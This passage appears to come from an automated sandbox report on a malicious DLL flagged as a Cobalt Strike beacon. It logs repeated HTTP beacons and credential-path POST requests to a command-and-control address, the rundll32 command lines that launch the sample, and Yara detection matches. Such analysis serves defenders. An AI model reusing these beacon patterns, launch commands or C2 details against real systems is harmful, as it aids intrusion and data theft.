              Date: Sat, 25 Sep 2021 18:20:38 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 64 | Source IP: 192.168.2.7 | Source Port: 49884 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:38.395628929 CEST | 7092 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=zv9990IHfydZ1S4wdAtNH5Uz0glmA7QgVc7SFqkhPTguf-AjMqzJvwFVvBFuNEjytlOVWegryo4Si30oAZgAn8FoWDWqquNN5U0KGa7JHrE-NYUtWtRmxbxGDCudRT8TPsCku6clasrpFgtr4TKSSD9vTvJW5kLlI4gCkGpuCBrIsAO7
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:38.424730062 CEST | 7092 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:38 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 65 | Source IP: 192.168.2.7 | Source Port: 49885 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:40.243335962 CEST | 7096 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=a3l4b84QDMHMTPJugfdvpjw-zk2cJJfw65ux3U6ad9sYk_4e--6I9ClGFez0BDqjRuVFhbXf62tu_BmFFrxxDHHQhOhfuUbB12e-7u4CtjlBsZ17X_RelWND-Kb0PDSeniZceCt1jsX1vxtpnOYJx9rIJEXWZ4yZ-82Dg7Rqp94FJDGP
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:40.273215055 CEST | 7096 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:40 GMT
              Server: cloudflare
              Content-Length: 2309
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              66 | 192.168.2.7 | 49886 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:43.956024885 CEST | 7100 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wazc5UxbY_VVaAta67f7mhfsKryMXjHGPoI_Ypus3ztuDyeqzWfxupztccLMx7GBvulZ0e4yedWMxlj_d2A0ehGn2qmuj8uXXoX8HAncauR3QVxOs83pS3ri1asN0hnytAKEnPY65Y_UnC2SOBqZcbrinfcgrhQNddMXSPRjY_mjAbrK
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:43.987164021 CEST | 7100 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:43 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              67 | 192.168.2.7 | 49887 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:44.589997053 CEST | 7103 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xHFrq0iJaXtTWzhsfoVbQ5-9xFVsjaJ8X0DESqOvK2Qk8fZ_OCLf4wvbqk1kul6uvN2DBeKl3NIYBWt0CxYWw8vmTmmgJPUR78McRaRHCO00u5NxUFpwmbbIGneXyylPNE6y562rfJbjmB0367yEFDXhWK5caFS5KQYUzGDgHkbCPhXn
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:44.619774103 CEST | 7104 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:44 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              68 | 192.168.2.7 | 49888 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:46.909986973 CEST | 7107 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fb4kWdjXUPfai65YlzAzkCr5knuK48vG_Vzt61hdK-0OVKIo7SnUwj-BSdriw2aVUCIZs6MYt114O0WzAHstOmcX2N5Jfhr3waDi2PjF6g9XdsFNSTMCo3WEpJDi-2ioiOEATj2y0vPjeEdfiiFV8cwPeHPAoNCv7QrftaKt--gT4225
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:46.939848900 CEST | 7108 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:46 GMT
              Server: cloudflare
              Content-Length: 2437
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              69 | 192.168.2.7 | 49889 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:50.594907045 CEST | 7111 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qy64ZifWurY8BOuhEdqIjvDiF5gD0nGxMB8Xh8zw-KlLriWyV30MLmSEeYAL5Y1j04JQyI36Dx93Wri5ZEnFDqS5naTPeybcgJzPiMsY2yBb5EC8PwWjVNmXybr4lPqCWxFhKsL0r1uMx876hONX2Vq-i2MzN4d0RlnHAQ-_zYutYcYq
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:50.623229980 CEST | 7111 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:50 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              7 | 192.168.2.7 | 49747 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:17.335114002 CEST | 1746 | OUT | POST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=CHBGJBMJBGCHKAPNBHCDKDPMBOCO HTTP/1.1
              Accept: image/*, application/xml, text/html
              Accept-Language: es-pe
              Accept-Encoding: gzip, *
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Content-Length: 11120
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:17.363569021 CEST | 1758 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:17 GMT
              Server: cloudflare
              Content-Length: 2119
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: plain/text; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              70 | 192.168.2.7 | 49890 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:51.737193108 CEST | 7115 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=r_odTyINol87PsrwheE6MHm66xbiCPBsUNT-yPX6HpEAWeYAozEwEPK7sGiikXAr0L-Ye4BkuH_ikJlVGTb10H_xGwPA2Qo9MNM9tmeKq04ZF53k3Zso4RS0FAFjhNhY2lRFNphsJCW6yuw4VkxY29S0XF1O-NWnG4XW4po1olPNV3tg
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:51.765187979 CEST | 7115 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:51 GMT
              Server: cloudflare
              Content-Length: 2309
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              71 | 192.168.2.7 | 49891 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:56.501699924 CEST | 7119 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xSBMbWBJOMNiFcZsL65bpJJn-k8yfaPyRcKF3-DDQ9m2ysocVbe89ocfIe5aXQ6h6LxxhxuG32nApS2HuOVFDt-JsOrx4HLDeT6K7EBbgjvv6Kl58a1ql80azKRaZQCcMH9oeoUsusdb5i9rMr89xXSREEd4PribVZS3gRozk9yrfQWN
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:56.531440973 CEST | 7119 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:56 GMT
              Server: cloudflare
              Content-Length: 2458
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              72 | 192.168.2.7 | 49892 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:57.174088955 CEST | 7122 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=V7L_yNtK_RjAmKwP7UbPIAx-UDb_TjYfzINQKTBsvwe3MmIcq-FLgJgYPi73ecrNLx4XZnFmSLGLxv8XmNWCoFgl2goz52FyfACIJjeEnI6neAcSw5nk-iULjhQECL0sp40mhD5o6PVwW4lUeH8Qd6YizM3Pq8DausWAr_MjiiVR_YGE
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:57.201987028 CEST | 7123 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:57 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              73 | 192.168.2.7 | 49893 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:58.340501070 CEST | 7126 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=LM835qE4iPa4C-BZBtQQmfqPwb9hPdrF0-HUYXbPNDiDbMypIAQauXGOmsEhpFqCU4qy0gNRktZhpbP8mgPfefzEMapD7CCUs-YXH-S_geeaIrdNXq4CSJeBPqjgsfLxWWFvnxtZDow5_8aR1XlycleBdvTNzf8OmLD8SxkAiPpOYlHJ
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:58.368211031 CEST | 7126 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:58 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              74 | 192.168.2.7 | 49894 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:21:02.789854050 CEST | 7130 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=GfTawrydrmy-wVDD83rNC06zbODuqTVdmRYTcDwX1XZqHlyziWMqWVvLt0GGiZgONGjnKMdSScYccbsoZDHToQNdJkUtNORspeocQ5yPFJQzPD_WLXn8OBHOWguGsZYz7Kv-1Vn4LGiHMrnE7muraqhFhuik6i40iUAhLsbnBXN3qZMi
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:21:02.831270933 CEST | 7130 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:21:02 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              75 | 192.168.2.7 | 49895 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:21:06.000195980 CEST | 7134 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=aE_wOOS38uj_ZaP_0rvA0DODX8bAsznv835f2Q-RsPeIz23slBxEcKflMd7IhMU9EOMYlk6bR0G0O_DnpyiNUGfY1foMGm6CQ_2H1gh5k36YhQji_GTrChr2geQ79bLcmHApdAGV5wVPpoakR4Ifh5nfwz3wVs8qhTiPX8zehdVuAI50
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:21:06.028147936 CEST | 7134 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:21:06 GMT
              Server: cloudflare
              Content-Length: 2202
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              76 | 192.168.2.7 | 49896 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:21:08.004734039 CEST | 7137 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rYKwfiB1D245RmfBh5mXAXvCRifgcF1dUqxT-feCs6ACIUsxoUmdIfDDHVmg6d0a0sc1SoIcFU7g6DRkG05Y4X2JtjLCoacMMquQh2XyBn8bbzDV3-OF0BbMuTBh_HVp2CzoB5oUiRS4skEJVDT16tbM8WxMgHiWGf1705hND2LPL9ZR
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:21:08.035444021 CEST | 7138 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:21:08 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              77 | 192.168.2.7 | 49897 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:21:09.573805094 CEST | 7141 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=tbLArRDbtAMSh0qsXzzXZOL1do9C7y8yNVAJH5BRzxnGWEbcJSUwNveNrS4qz4JhmC79R2sUU6mwN6FHyHfJzq8bPCqBcv4DCawGLDDJDvufeiW5gT_mV72IQGQq94xcQO3kuvW-NgcrdKOrQi2xBQQDnIcIrDRbJQY7QWqhHxzb74lN
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:21:09.602147102 CEST | 7142 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:21:09 GMT
              Server: cloudflare
              Content-Length: 2330
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              8 | 192.168.2.7 | 49749 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:19.820122004 CEST | 1761 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=7XJRhGCF7pR5toY7x2l2-zsyp92ggLynElyyA7dyUlpC0arL4bl827Az_KPgGTzgkjfUsMLs9LSgGNWeW765Gz15V8iCUUb2cltxfSUC54Vbn9EvnxNkKlY8WMohDJSTmNwJ_drkaO74QqDzFMQUEJY8EJYMcJlsWQ2aKdi97piP3zer
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:19.848558903 CEST | 1762 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:19 GMT
              Server: cloudflare
              Content-Length: 2266
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              9 | 192.168.2.7 | 49751 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:20.008554935 CEST | 1765 | OUT | POST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=BEEBAOMDCBHADPPFCEHFDNPACA HTTP/1.1
              Accept: image/*, application/xml, text/html
              Accept-Language: es-pe
              Accept-Encoding: gzip, *
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Content-Length: 11216
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:20.036293983 CEST | 1776 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:20 GMT
              Server: cloudflare
              Content-Length: 2191
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: plain/text; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Code Manipulations

              Statistics

              Behavior

              System Behavior

              General

              Start time: 20:18:08
              Start date: 25/09/2021
              Path: C:\Windows\System32\loaddll64.exe
              Wow64 process (32bit): false
              Commandline: loaddll64.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll'
              Imagebase: 0x7ff6f8d30000
              File size: 140288 bytes
              MD5 hash: A84133CCB118CF35D49A423CD836D0EF
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Reputation: high

              General

              Start time: 20:18:09
              Start date: 25/09/2021
              Path: C:\Windows\System32\cmd.exe
              Wow64 process (32bit): false
              Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
              Imagebase: 0x7ff7bf140000
              File size: 273920 bytes
              MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Reputation: high

              General

              Start time: 20:18:09
              Start date: 25/09/2021
              Path: C:\Windows\System32\rundll32.exe
              Wow64 process (32bit): false
              Commandline: rundll32.exe C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll,gSDCSXjfiSV
              Imagebase: 0x7ff6b8550000
              File size: 69632 bytes
              MD5 hash: 73C519F050C20580F8A62C849D49215A
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000003.00000002.640651466.0000019BD8300000.00000020.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.636991024.000000006BC03000.00000004.00020000.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.636991024.000000006BC03000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.640457266.0000019BD7B00000.00000020.00000001.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.640457266.0000019BD7B00000.00000020.00000001.sdmp, Author: Joe Security
              Reputation: high

              General

              Start time: 20:18:09
              Start date: 25/09/2021
              Path: C:\Windows\System32\rundll32.exe
              Wow64 process (32bit): false
              Commandline: rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
              Imagebase: 0x7ff6b8550000
              File size: 69632 bytes
              MD5 hash: 73C519F050C20580F8A62C849D49215A
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000004.00000002.641196073.0000012256620000.00000020.00000001.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000004.00000002.641196073.0000012256620000.00000020.00000001.sdmp, Author: Joe Security
              • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000004.00000002.641582274.0000012256E00000.00000020.00000001.sdmp, Author: yara@s3c.za.net
              Reputation: high

              General

              Start time: 20:18:13
              Start date: 25/09/2021
              Path: C:\Windows\System32\rundll32.exe
              Wow64 process (32bit): false
              Commandline: rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',gSDCSXjfiSV
